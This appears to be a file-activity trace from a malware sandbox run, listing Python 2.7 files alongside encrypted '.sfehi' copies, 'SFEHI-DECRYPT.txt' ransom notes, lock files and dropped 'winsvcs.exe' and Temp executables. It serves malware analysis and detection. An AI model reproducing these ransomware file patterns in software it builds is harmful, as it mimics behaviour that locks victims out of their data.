C:\Python27\Lib\bsddb\test\test_recno.py
C:\Python27\Lib\bsddb\test\test_replication.py
C:\Python27\Lib\bsddb\test\test_sequence.py
C:\Python27\Lib\bsddb\test\test_thread.py
C:\Python27\Lib\bsddb\__init__.py
C:\Python27\Lib\calendar.py
C:\Python27\Lib\calendar.pyc
C:\Python27\Lib\cgi.py
C:\Python27\Lib\CGIHTTPServer.py
C:\Python27\Lib\cgitb.py
C:\Python27\Lib\chunk.py
C:\Python27\Lib\cmd.py
C:\Python27\Lib\code.py
C:\Python27\Lib\code.pyc
C:\Python27\Lib\codecs.py
C:\Python27\Lib\codecs.pyc
C:\Python27\Lib\codecs.pyo
C:\Python27\Lib\codeop.py
C:\Python27\Lib\codeop.pyc
C:\Python27\Lib\collections.py
C:\Python27\Lib\collections.pyc
C:\Python27\Lib\colorsys.py
C:\Python27\Lib\commands.py
C:\Python27\Lib\compileall.py
C:\Python27\Lib\compiler\ast.py
C:\Python27\Lib\compiler\consts.py
C:\Python27\Lib\compiler\future.py
C:\Python27\Lib\compiler\misc.py
C:\Python27\Lib\compiler\pyassem.py
C:\Python27\Lib\compiler\pycodegen.py
C:\Python27\Lib\compiler\symbols.py
C:\Python27\Lib\compiler\syntax.py
C:\Python27\Lib\compiler\transformer.py
C:\Python27\Lib\compiler\visitor.py
C:\Python27\Lib\compiler\__init__.py
C:\Python27\Lib\ConfigParser.py
C:\Python27\Lib\ConfigParser.pyc
C:\Python27\Lib\contextlib.py
C:\Python27\Lib\Cookie.py
C:\Python27\Lib\cookielib.py
C:\Python27\Lib\copy.py
C:\Python27\Lib\copy.pyc
C:\Python27\Lib\copy_reg.py
C:\Python27\Lib\copy_reg.pyc
C:\Python27\Lib\copy_reg.pyo
C:\Python27\Lib\cProfile.py
C:\Python27\Lib\csv.py
C:\Python27\Lib\ctypes\macholib\dyld.py
C:\Python27\Lib\ctypes\macholib\dylib.py
C:\Windows\5769805074060605\winsvcs.exe
C:\Users\user\AppData\Local\Temp\1865041414.exe
C:\Users\user\AppData\Local\Temp\2841536727.exe
C:\Users\user\AppData\Local\Temp\3751939260.exe
C:\Users\user\AppData\Local\Temp\2080821079.exe
C:\Users\user\AppData\Local\Temp\1257032286.exe
C:\Users\user\AppData\Local\Temp\1674519319.exe
C:\Users\user\AppData\Local\Temp\3065331339.exe
C:\Users\user\AppData\Local\Temp\3876917383.exe
C:\Users\user\AppData\Local\Temp\2810629864.exe
C:\Users\user\AppData\Local\Temp\3750816931.exe
C:\Users\user\AppData\Local\Temp\1398632723.exe
C:\Users\user\AppData\Local\Temp\4032832645.exe
C:\Users\user\AppData\Local\Temp\1674315261.exe
C:\Users\user\AppData\Local\Temp\2459023548.exe
C:\Users\user\AppData\Local\Temp\3304035876.exe
C:\Users\user\AppData\Local\Temp\2400240831.exe
C:\Users\user\AppData\Local\Temp\2686919881.exe
C:\Users\user\AppData\Local\Temp\2293722122.exe
C:\Users\user\AppData\Local\Temp\1227434603.exe
C:\Users\user\AppData\Local\Temp\2673932424.exe
C:\Users\user\AppData\Local\Temp\2414711781.exe
C:\Windows\806084767800850\winsvcs.exe
C:\Users\user\AppData\Local\Temp\1495120250.exe
C:\Users\user\AppData\Local\Temp\1717238076.exe
C:\SFEHI-DECRYPT.txt
\??\PIPE\wkssvc
C:\a4889873a4889f9232.lock
C:\$Recycle.Bin\SFEHI-DECRYPT.txt
\Device\LanmanDatagramReceiver
C:\$Recycle.Bin\a4889873a4889f9232.lock
C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\SFEHI-DECRYPT.txt
C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\a4889873a4889f9232.lock
C:\agent.pyw
C:\agent.pyw.sfehi
C:\Documents and Settings\SFEHI-DECRYPT.txt
C:\Documents and Settings\a4889873a4889f9232.lock
C:\Drivers\SFEHI-DECRYPT.txt
C:\Drivers\a4889873a4889f9232.lock
C:\Drivers\nusb3hub.cat
C:\Drivers\nusb3hub.inf
C:\Drivers\nusb3xhc.cat
C:\Drivers\nusb3xhc.inf
C:\Hotfix\SFEHI-DECRYPT.txt
C:\Hotfix\a4889873a4889f9232.lock
C:\Hotfix\LocalPack\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\a4889873a4889f9232.lock
C:\Hotfix\LocalPack\x64\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x64\a4889873a4889f9232.lock
C:\Hotfix\LocalPack\x86\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x86\a4889873a4889f9232.lock
C:\Hotfix\Update\SFEHI-DECRYPT.txt
C:\Hotfix\Update\a4889873a4889f9232.lock
C:\Hotfix\Update\x64\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x64\a4889873a4889f9232.lock
C:\Hotfix\Update\x86\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x86\a4889873a4889f9232.lock
C:\MSOCache\SFEHI-DECRYPT.txt
C:\MSOCache\a4889873a4889f9232.lock
C:\PerfLogs\SFEHI-DECRYPT.txt
C:\PerfLogs\a4889873a4889f9232.lock
C:\PerfLogs\Admin\SFEHI-DECRYPT.txt
C:\PerfLogs\Admin\a4889873a4889f9232.lock
C:\Program Files\SFEHI-DECRYPT.txt
C:\Program Files\a4889873a4889f9232.lock
C:\Program Files (x86)\SFEHI-DECRYPT.txt
C:\Program Files (x86)\a4889873a4889f9232.lock
C:\Python27\SFEHI-DECRYPT.txt
C:\Python27\a4889873a4889f9232.lock
C:\Python27\DLLs\SFEHI-DECRYPT.txt
C:\Python27\DLLs\a4889873a4889f9232.lock
C:\Python27\DLLs\bz2.pyd
C:\Python27\DLLs\bz2.pyd.sfehi
C:\Python27\DLLs\pyexpat.pyd
C:\Python27\DLLs\select.pyd
C:\Python27\DLLs\unicodedata.pyd
C:\Python27\DLLs\unicodedata.pyd.sfehi
C:\Python27\DLLs\winsound.pyd
C:\Python27\DLLs\winsound.pyd.sfehi
C:\Python27\DLLs\_bsddb.pyd
C:\Python27\DLLs\_bsddb.pyd.sfehi
C:\Python27\DLLs\_ctypes.pyd
C:\Python27\DLLs\_ctypes_test.pyd
\??\PIPE\DAV RPC SERVICE
C:\Python27\DLLs\_ctypes_test.pyd.sfehi
C:\Python27\DLLs\_elementtree.pyd
C:\Python27\DLLs\_elementtree.pyd.sfehi
C:\Python27\DLLs\_hashlib.pyd
C:\Python27\DLLs\_msi.pyd
C:\Python27\DLLs\_msi.pyd.sfehi
C:\Python27\DLLs\_multiprocessing.pyd
C:\Python27\DLLs\_multiprocessing.pyd.sfehi
C:\Python27\DLLs\_socket.pyd
C:\Python27\DLLs\_sqlite3.pyd
C:\Python27\DLLs\_sqlite3.pyd.sfehi
C:\Python27\DLLs\_ssl.pyd
C:\Python27\DLLs\_testcapi.pyd
C:\Python27\DLLs\_testcapi.pyd.sfehi
C:\Python27\DLLs\_tkinter.pyd
C:\Python27\Doc\SFEHI-DECRYPT.txt
C:\Python27\Doc\a4889873a4889f9232.lock
C:\Python27\Doc\python276.chm
C:\Python27\Doc\python276.chm.sfehi
C:\Python27\include\SFEHI-DECRYPT.txt
C:\Python27\include\a4889873a4889f9232.lock
C:\Python27\include\abstract.h
C:\Python27\include\abstract.h.sfehi
C:\Python27\include\asdl.h
C:\Python27\include\asdl.h.sfehi
C:\Python27\include\ast.h
C:\Python27\include\ast.h.sfehi
C:\Python27\include\bitset.h
C:\Python27\include\bitset.h.sfehi
C:\Python27\include\boolobject.h
C:\Python27\include\boolobject.h.sfehi
C:\Python27\include\bufferobject.h
C:\Python27\include\bufferobject.h.sfehi
C:\Python27\include\bytearrayobject.h
C:\Python27\include\bytearrayobject.h.sfehi
C:\Python27\include\bytesobject.h
C:\Python27\include\bytesobject.h.sfehi
C:\Python27\include\bytes_methods.h
C:\Python27\include\bytes_methods.h.sfehi
C:\Python27\include\cellobject.h
C:\Python27\include\cellobject.h.sfehi
C:\Python27\include\ceval.h
C:\Python27\include\ceval.h.sfehi
C:\Python27\include\classobject.h
C:\Python27\include\classobject.h.sfehi
C:\Python27\include\cobject.h
C:\Python27\include\cobject.h.sfehi
C:\Python27\include\code.h
C:\Python27\include\code.h.sfehi
C:\Python27\include\codecs.h
C:\Python27\include\codecs.h.sfehi
C:\Python27\include\compile.h
C:\Python27\include\compile.h.sfehi
C:\Python27\include\complexobject.h
C:\Python27\include\complexobject.h.sfehi
C:\Python27\include\cStringIO.h
C:\Python27\include\cStringIO.h.sfehi
C:\Python27\include\datetime.h
C:\Python27\include\datetime.h.sfehi
C:\Python27\include\descrobject.h
C:\Python27\include\descrobject.h.sfehi
C:\Python27\include\dictobject.h
C:\Python27\include\dictobject.h.sfehi
C:\Python27\include\dtoa.h
C:\Python27\include\dtoa.h.sfehi
C:\Python27\include\enumobject.h
C:\Python27\include\enumobject.h.sfehi
C:\Python27\include\errcode.h
C:\Python27\include\errcode.h.sfehi
C:\Python27\include\eval.h
C:\Python27\include\eval.h.sfehi
C:\Python27\include\fileobject.h
C:\Python27\include\fileobject.h.sfehi
C:\Python27\include\floatobject.h
C:\Python27\include\floatobject.h.sfehi
C:\Python27\include\frameobject.h
C:\Python27\include\frameobject.h.sfehi
C:\Python27\include\funcobject.h
C:\Python27\include\funcobject.h.sfehi
C:\Python27\include\genobject.h
C:\Python27\include\genobject.h.sfehi
C:\Python27\include\graminit.h
C:\Python27\include\graminit.h.sfehi
C:\Python27\include\grammar.h
C:\Python27\include\grammar.h.sfehi
C:\Python27\include\import.h
C:\Python27\include\import.h.sfehi
C:\Python27\include\intobject.h
C:\Python27\include\intobject.h.sfehi
C:\Python27\include\intrcheck.h
C:\Python27\include\intrcheck.h.sfehi
C:\Python27\include\iterobject.h
C:\Python27\include\iterobject.h.sfehi
C:\Python27\include\listobject.h
C:\Python27\include\listobject.h.sfehi
C:\Python27\include\longintrepr.h
C:\Python27\include\longintrepr.h.sfehi
C:\Python27\include\longobject.h
C:\Python27\include\longobject.h.sfehi
C:\Python27\include\marshal.h
C:\Python27\include\marshal.h.sfehi
C:\Python27\include\memoryobject.h
C:\Python27\include\memoryobject.h.sfehi
C:\Python27\include\metagrammar.h
C:\Python27\include\metagrammar.h.sfehi
C:\Python27\include\methodobject.h
C:\Python27\include\methodobject.h.sfehi
C:\Python27\include\modsupport.h
C:\Python27\include\modsupport.h.sfehi
C:\Python27\include\moduleobject.h
C:\Python27\include\moduleobject.h.sfehi
C:\Python27\include\node.h
C:\Python27\include\node.h.sfehi
C:\Python27\include\object.h
C:\Python27\include\object.h.sfehi
C:\Python27\include\objimpl.h
C:\Python27\include\objimpl.h.sfehi
C:\Python27\include\opcode.h
C:\Python27\include\opcode.h.sfehi
C:\Python27\include\osdefs.h
C:\Python27\include\osdefs.h.sfehi
C:\Python27\include\parsetok.h
C:\Python27\include\parsetok.h.sfehi
C:\Python27\include\patchlevel.h
C:\Python27\include\patchlevel.h.sfehi
C:\Python27\include\pgen.h
C:\Python27\include\pgen.h.sfehi
C:\Python27\include\pgenheaders.h
C:\Python27\include\pgenheaders.h.sfehi
C:\Python27\include\pyarena.h
C:\Python27\include\pyarena.h.sfehi
C:\Python27\include\pycapsule.h
C:\Python27\include\pycapsule.h.sfehi
C:\Python27\include\pyconfig.h
C:\Python27\include\pyconfig.h.sfehi
C:\Python27\include\pyctype.h
C:\Python27\include\pyctype.h.sfehi
C:\Python27\include\pydebug.h
C:\Python27\include\pydebug.h.sfehi
C:\Python27\include\pyerrors.h
C:\Python27\include\pyerrors.h.sfehi
C:\Python27\include\pyexpat.h
C:\Python27\include\pyexpat.h.sfehi
C:\Python27\include\pyfpe.h
C:\Python27\include\pyfpe.h.sfehi
C:\Python27\include\pygetopt.h
C:\Python27\include\pygetopt.h.sfehi
C:\Python27\include\pymacconfig.h
C:\Python27\include\pymacconfig.h.sfehi
C:\Python27\include\pymactoolbox.h
C:\Python27\include\pymactoolbox.h.sfehi
C:\Python27\include\pymath.h
C:\Python27\include\pymath.h.sfehi
C:\Python27\include\pymem.h
C:\Python27\include\pymem.h.sfehi
C:\Python27\include\pyport.h
C:\Python27\include\pyport.h.sfehi
C:\Python27\include\pystate.h
C:\Python27\include\pystate.h.sfehi
C:\Python27\include\pystrcmp.h
C:\Python27\include\pystrcmp.h.sfehi
C:\Python27\include\pystrtod.h
C:\Python27\include\pystrtod.h.sfehi
C:\Python27\include\Python-ast.h
C:\Python27\include\Python-ast.h.sfehi
C:\Python27\include\Python.h
C:\Python27\include\Python.h.sfehi
C:\Python27\include\pythonrun.h
C:\Python27\include\pythonrun.h.sfehi
C:\Python27\include\pythread.h
C:\Python27\include\pythread.h.sfehi
C:\Python27\include\py_curses.h
C:\Python27\include\py_curses.h.sfehi
C:\Python27\include\rangeobject.h
C:\Python27\include\rangeobject.h.sfehi
C:\Python27\include\setobject.h
C:\Python27\include\setobject.h.sfehi
C:\Python27\include\sliceobject.h
C:\Python27\include\sliceobject.h.sfehi
C:\Python27\include\stringobject.h
C:\Python27\include\stringobject.h.sfehi
C:\Python27\include\structmember.h
C:\Python27\include\structmember.h.sfehi
C:\Python27\include\structseq.h
C:\Python27\include\structseq.h.sfehi
C:\Python27\include\symtable.h
C:\Python27\include\symtable.h.sfehi
C:\Python27\include\sysmodule.h
C:\Python27\include\sysmodule.h.sfehi
C:\Python27\include\timefuncs.h
C:\Python27\include\timefuncs.h.sfehi
C:\Python27\include\token.h
C:\Python27\include\token.h.sfehi
C:\Python27\include\traceback.h
C:\Python27\include\traceback.h.sfehi
C:\Python27\include\tupleobject.h
C:\Python27\include\tupleobject.h.sfehi
C:\Python27\include\ucnhash.h
C:\Python27\include\ucnhash.h.sfehi
C:\Python27\include\unicodeobject.h
C:\Python27\include\unicodeobject.h.sfehi
C:\Python27\include\warnings.h
C:\Python27\include\warnings.h.sfehi
C:\Python27\include\weakrefobject.h
C:\Python27\include\weakrefobject.h.sfehi
C:\Python27\Lib\SFEHI-DECRYPT.txt
C:\Python27\Lib\a4889873a4889f9232.lock
C:\Python27\Lib\abc.py
C:\Python27\Lib\abc.py.sfehi
C:\Python27\Lib\abc.pyc
C:\Python27\Lib\abc.pyc.sfehi
C:\Python27\Lib\abc.pyo
C:\Python27\Lib\abc.pyo.sfehi
C:\Python27\Lib\aifc.py
C:\Python27\Lib\aifc.py.sfehi
C:\Python27\Lib\antigravity.py
C:\Python27\Lib\antigravity.py.sfehi
C:\Python27\Lib\anydbm.py
C:\Python27\Lib\anydbm.py.sfehi
C:\Python27\Lib\argparse.py
C:\Python27\Lib\argparse.py.sfehi
C:\Python27\Lib\ast.py
C:\Python27\Lib\ast.py.sfehi
C:\Python27\Lib\asynchat.py
C:\Python27\Lib\asynchat.py.sfehi
C:\Python27\Lib\asyncore.py
C:\Python27\Lib\asyncore.py.sfehi
C:\Python27\Lib\atexit.py
C:\Python27\Lib\atexit.py.sfehi
C:\Python27\Lib\atexit.pyc
C:\Python27\Lib\atexit.pyc.sfehi
C:\Python27\Lib\audiodev.py
C:\Python27\Lib\audiodev.py.sfehi
C:\Python27\Lib\base64.py
C:\Python27\Lib\base64.py.sfehi
C:\Python27\Lib\base64.pyc
C:\Python27\Lib\base64.pyc.sfehi
C:\Python27\Lib\BaseHTTPServer.py
C:\Python27\Lib\BaseHTTPServer.py.sfehi
C:\Python27\Lib\BaseHTTPServer.pyc
C:\Python27\Lib\BaseHTTPServer.pyc.sfehi
C:\Python27\Lib\Bastion.py
C:\Python27\Lib\Bastion.py.sfehi
C:\Python27\Lib\bdb.py
C:\Python27\Lib\bdb.py.sfehi
C:\Python27\Lib\bdb.pyc
C:\Python27\Lib\bdb.pyc.sfehi
C:\Python27\Lib\binhex.py
C:\Python27\Lib\binhex.py.sfehi
C:\Python27\Lib\bisect.py
C:\Python27\Lib\bisect.py.sfehi
C:\Python27\Lib\bsddb\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\a4889873a4889f9232.lock
C:\Python27\Lib\bsddb\db.py
C:\Python27\Lib\bsddb\db.py.sfehi
C:\Python27\Lib\bsddb\dbobj.py
C:\Python27\Lib\bsddb\dbobj.py.sfehi
C:\Python27\Lib\bsddb\dbrecio.py
C:\Python27\Lib\bsddb\dbrecio.py.sfehi
C:\Python27\Lib\bsddb\dbshelve.py
C:\Python27\Lib\bsddb\dbshelve.py.sfehi
C:\Python27\Lib\bsddb\dbtables.py
C:\Python27\Lib\bsddb\dbtables.py.sfehi
C:\Python27\Lib\bsddb\dbutils.py
C:\Python27\Lib\bsddb\dbutils.py.sfehi
C:\Python27\Lib\bsddb\test\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\test\a4889873a4889f9232.lock
C:\Python27\Lib\bsddb\test\test_all.py
C:\Python27\Lib\bsddb\test\test_all.py.sfehi
C:\Python27\Lib\bsddb\test\test_associate.py
C:\Python27\Lib\bsddb\test\test_associate.py.sfehi
C:\Python27\Lib\bsddb\test\test_basics.py
C:\Python27\Lib\bsddb\test\test_basics.py.sfehi
C:\Python27\Lib\bsddb\test\test_compare.py
C:\Python27\Lib\bsddb\test\test_compare.py.sfehi
C:\Python27\Lib\bsddb\test\test_compat.py
C:\Python27\Lib\bsddb\test\test_compat.py.sfehi
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py.sfehi
C:\Python27\Lib\bsddb\test\test_db.py
C:\Python27\Lib\bsddb\test\test_db.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbenv.py
C:\Python27\Lib\bsddb\test\test_dbenv.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbobj.py
C:\Python27\Lib\bsddb\test\test_dbobj.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbshelve.py
C:\Python27\Lib\bsddb\test\test_dbshelve.py.sfehi
C:\Python27\Lib\bsddb\test\test_dbtables.py
C:\Python27\Lib\bsddb\test\test_dbtables.py.sfehi
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py.sfehi
C:\Python27\Lib\bsddb\test\test_early_close.py
C:\Python27\Lib\bsddb\test\test_early_close.py.sfehi
C:\Python27\Lib\bsddb\test\test_fileid.py
C:\Python27\Lib\bsddb\test\test_fileid.py.sfehi
C:\Python27\Lib\bsddb\test\test_get_none.py
C:\Python27\Lib\bsddb\test\test_get_none.py.sfehi
C:\Python27\Lib\bsddb\test\test_join.py
C:\Python27\Lib\bsddb\test\test_join.py.sfehi
C:\Python27\Lib\bsddb\test\test_lock.py
C:\Python27\Lib\bsddb\test\test_lock.py.sfehi
C:\Python27\Lib\bsddb\test\test_misc.py
C:\Python27\Lib\bsddb\test\test_misc.py.sfehi
C:\Python27\Lib\bsddb\test\test_pickle.py
C:\Python27\Lib\bsddb\test\test_pickle.py.sfehi
C:\Python27\Lib\bsddb\test\test_queue.py
C:\Python27\Lib\bsddb\test\test_queue.py.sfehi
C:\Python27\Lib\bsddb\test\test_recno.py
C:\Python27\Lib\bsddb\test\test_recno.py.sfehi
C:\Python27\Lib\bsddb\test\test_replication.py
C:\Python27\Lib\bsddb\test\test_replication.py.sfehi
C:\Python27\Lib\bsddb\test\test_sequence.py
C:\Python27\Lib\bsddb\test\test_sequence.py.sfehi
C:\Python27\Lib\bsddb\test\test_thread.py
C:\Python27\Lib\bsddb\test\test_thread.py.sfehi
C:\Python27\Lib\bsddb\__init__.py
C:\Python27\Lib\bsddb\__init__.py.sfehi
C:\Python27\Lib\calendar.py
C:\Python27\Lib\calendar.py.sfehi
C:\Python27\Lib\calendar.pyc
C:\Python27\Lib\calendar.pyc.sfehi
C:\Python27\Lib\cgi.py
C:\Python27\Lib\cgi.py.sfehi
C:\Python27\Lib\CGIHTTPServer.py
C:\Python27\Lib\CGIHTTPServer.py.sfehi
C:\Python27\Lib\cgitb.py
C:\Python27\Lib\cgitb.py.sfehi
C:\Python27\Lib\chunk.py
C:\Python27\Lib\chunk.py.sfehi
C:\Python27\Lib\cmd.py
C:\Python27\Lib\cmd.py.sfehi
C:\Python27\Lib\code.py
C:\Python27\Lib\code.py.sfehi
C:\Python27\Lib\code.pyc
C:\Python27\Lib\code.pyc.sfehi
C:\Python27\Lib\codecs.py
C:\Python27\Lib\codecs.py.sfehi
C:\Python27\Lib\codecs.pyc
C:\Python27\Lib\codecs.pyc.sfehi
C:\Python27\Lib\codecs.pyo
C:\Python27\Lib\codecs.pyo.sfehi
C:\Python27\Lib\codeop.py
C:\Python27\Lib\codeop.py.sfehi
C:\Python27\Lib\codeop.pyc
C:\Python27\Lib\codeop.pyc.sfehi
C:\Python27\Lib\collections.py
C:\Python27\Lib\collections.py.sfehi
C:\Python27\Lib\collections.pyc
C:\Python27\Lib\collections.pyc.sfehi
C:\Python27\Lib\colorsys.py
C:\Python27\Lib\colorsys.py.sfehi
C:\Python27\Lib\commands.py
C:\Python27\Lib\commands.py.sfehi
C:\Python27\Lib\compileall.py
C:\Python27\Lib\compileall.py.sfehi
C:\Python27\Lib\compiler\SFEHI-DECRYPT.txt
C:\Python27\Lib\compiler\a4889873a4889f9232.lock
C:\Python27\Lib\compiler\ast.py
C:\Python27\Lib\compiler\ast.py.sfehi
C:\Python27\Lib\compiler\consts.py
C:\Python27\Lib\compiler\consts.py.sfehi
C:\Python27\Lib\compiler\future.py
C:\Python27\Lib\compiler\future.py.sfehi
C:\Python27\Lib\compiler\misc.py
C:\Python27\Lib\compiler\misc.py.sfehi
C:\Python27\Lib\compiler\pyassem.py
C:\Python27\Lib\compiler\pyassem.py.sfehi
C:\Python27\Lib\compiler\pycodegen.py
C:\Python27\Lib\compiler\pycodegen.py.sfehi
C:\Python27\Lib\compiler\symbols.py
C:\Python27\Lib\compiler\symbols.py.sfehi
C:\Python27\Lib\compiler\syntax.py
C:\Python27\Lib\compiler\syntax.py.sfehi
C:\Python27\Lib\compiler\transformer.py
C:\Python27\Lib\compiler\transformer.py.sfehi
C:\Python27\Lib\compiler\visitor.py
C:\Python27\Lib\compiler\visitor.py.sfehi
C:\Python27\Lib\compiler\__init__.py
C:\Python27\Lib\compiler\__init__.py.sfehi
C:\Python27\Lib\ConfigParser.py
C:\Python27\Lib\ConfigParser.py.sfehi
C:\Python27\Lib\ConfigParser.pyc
C:\Python27\Lib\ConfigParser.pyc.sfehi
C:\Python27\Lib\contextlib.py
C:\Python27\Lib\contextlib.py.sfehi
C:\Python27\Lib\Cookie.py
C:\Python27\Lib\Cookie.py.sfehi
C:\Python27\Lib\cookielib.py
C:\Python27\Lib\cookielib.py.sfehi
C:\Python27\Lib\copy.py
C:\Python27\Lib\copy.py.sfehi
C:\Python27\Lib\copy.pyc
C:\Python27\Lib\copy.pyc.sfehi
C:\Python27\Lib\copy_reg.py
C:\Python27\Lib\copy_reg.py.sfehi
C:\Python27\Lib\copy_reg.pyc
C:\Python27\Lib\copy_reg.pyc.sfehi
C:\Python27\Lib\copy_reg.pyo
C:\Python27\Lib\copy_reg.pyo.sfehi
C:\Python27\Lib\cProfile.py
C:\Python27\Lib\cProfile.py.sfehi
C:\Python27\Lib\csv.py
C:\Python27\Lib\csv.py.sfehi
C:\Python27\Lib\ctypes\SFEHI-DECRYPT.txt
C:\Python27\Lib\ctypes\a4889873a4889f9232.lock
C:\Python27\Lib\ctypes\macholib\SFEHI-DECRYPT.txt
C:\Python27\Lib\ctypes\macholib\a4889873a4889f9232.lock
C:\Python27\Lib\ctypes\macholib\dyld.py
C:\Python27\Lib\ctypes\macholib\dyld.py.sfehi
C:\Python27\Lib\ctypes\macholib\dylib.py
C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe:Zone.Identifier
C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2841536727.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3751939260.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1865041414.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2080821079.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1257032286.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1674519319.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3065331339.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3876917383.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2810629864.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3750816931.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1398632723.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\4032832645.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1674315261.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2459023548.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3304035876.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2400240831.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2686919881.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2293722122.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1227434603.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2673932424.exe:Zone.Identifier
C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1495120250.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1717238076.exe:Zone.Identifier
C:\agent.pyw
C:\Python27\DLLs\bz2.pyd
C:\Python27\DLLs\unicodedata.pyd
C:\Python27\DLLs\winsound.pyd
C:\Python27\DLLs\_bsddb.pyd
C:\Python27\DLLs\_ctypes_test.pyd
C:\Python27\DLLs\_elementtree.pyd
C:\Python27\DLLs\_msi.pyd
C:\Python27\DLLs\_multiprocessing.pyd
C:\Python27\DLLs\_sqlite3.pyd
C:\Python27\DLLs\_testcapi.pyd
C:\Python27\Doc\python276.chm
C:\Python27\include\abstract.h
C:\Python27\include\asdl.h
C:\Python27\include\ast.h
C:\Python27\include\bitset.h
C:\Python27\include\boolobject.h
C:\Python27\include\bufferobject.h
C:\Python27\include\bytearrayobject.h
C:\Python27\include\bytesobject.h
C:\Python27\include\bytes_methods.h
C:\Python27\include\cellobject.h
C:\Python27\include\ceval.h
C:\Python27\include\classobject.h
C:\Python27\include\cobject.h
C:\Python27\include\code.h
C:\Python27\include\codecs.h
C:\Python27\include\compile.h
C:\Python27\include\complexobject.h
C:\Python27\include\cStringIO.h
C:\Python27\include\datetime.h
C:\Python27\include\descrobject.h
C:\Python27\include\dictobject.h
C:\Python27\include\dtoa.h
C:\Python27\include\enumobject.h
C:\Python27\include\errcode.h
C:\Python27\include\eval.h
C:\Python27\include\fileobject.h
C:\Python27\include\floatobject.h
C:\Python27\include\frameobject.h
C:\Python27\include\funcobject.h
C:\Python27\include\genobject.h
C:\Python27\include\graminit.h
C:\Python27\include\grammar.h
C:\Python27\include\import.h
C:\Python27\include\intobject.h
C:\Python27\include\intrcheck.h
C:\Python27\include\iterobject.h
C:\Python27\include\listobject.h
C:\Python27\include\longintrepr.h
C:\Python27\include\longobject.h
C:\Python27\include\marshal.h
C:\Python27\include\memoryobject.h
C:\Python27\include\metagrammar.h
C:\Python27\include\methodobject.h
C:\Python27\include\modsupport.h
C:\Python27\include\moduleobject.h
C:\Python27\include\node.h
C:\Python27\include\object.h
C:\Python27\include\objimpl.h
C:\Python27\include\opcode.h
C:\Python27\include\osdefs.h
C:\Python27\include\parsetok.h
C:\Python27\include\patchlevel.h
C:\Python27\include\pgen.h
C:\Python27\include\pgenheaders.h
C:\Python27\include\pyarena.h
C:\Python27\include\pycapsule.h
C:\Python27\include\pyconfig.h
C:\Python27\include\pyctype.h
C:\Python27\include\pydebug.h
C:\Python27\include\pyerrors.h
C:\Python27\include\pyexpat.h
C:\Python27\include\pyfpe.h
C:\Python27\include\pygetopt.h
C:\Python27\include\pymacconfig.h
C:\Python27\include\pymactoolbox.h
C:\Python27\include\pymath.h
C:\Python27\include\pymem.h
C:\Python27\include\pyport.h
C:\Python27\include\pystate.h
C:\Python27\include\pystrcmp.h
C:\Python27\include\pystrtod.h
C:\Python27\include\Python-ast.h
C:\Python27\include\Python.h
C:\Python27\include\pythonrun.h
C:\Python27\include\pythread.h
C:\Python27\include\py_curses.h
C:\Python27\include\rangeobject.h
C:\Python27\include\setobject.h
C:\Python27\include\sliceobject.h
C:\Python27\include\stringobject.h
C:\Python27\include\structmember.h
C:\Python27\include\structseq.h
C:\Python27\include\symtable.h
C:\Python27\include\sysmodule.h
C:\Python27\include\timefuncs.h
C:\Python27\include\token.h
C:\Python27\include\traceback.h
C:\Python27\include\tupleobject.h
C:\Python27\include\ucnhash.h
C:\Python27\include\unicodeobject.h
C:\Python27\include\warnings.h
C:\Python27\include\weakrefobject.h
C:\Python27\Lib\abc.py
C:\Python27\Lib\abc.pyc
C:\Python27\Lib\abc.pyo
C:\Python27\Lib\aifc.py
C:\Python27\Lib\antigravity.py
C:\Python27\Lib\anydbm.py
C:\Python27\Lib\argparse.py
C:\Python27\Lib\ast.py
C:\Python27\Lib\asynchat.py
C:\Python27\Lib\asyncore.py
C:\Python27\Lib\atexit.py
C:\Python27\Lib\atexit.pyc
C:\Python27\Lib\audiodev.py
C:\Python27\Lib\base64.py
C:\Python27\Lib\base64.pyc
C:\Python27\Lib\BaseHTTPServer.py
C:\Python27\Lib\BaseHTTPServer.pyc
C:\Python27\Lib\Bastion.py
C:\Python27\Lib\bdb.py
C:\Python27\Lib\bdb.pyc
C:\Python27\Lib\binhex.py
C:\Python27\Lib\bisect.py
C:\Python27\Lib\bsddb\db.py
C:\Python27\Lib\bsddb\dbobj.py
C:\Python27\Lib\bsddb\dbrecio.py
C:\Python27\Lib\bsddb\dbshelve.py
C:\Python27\Lib\bsddb\dbtables.py
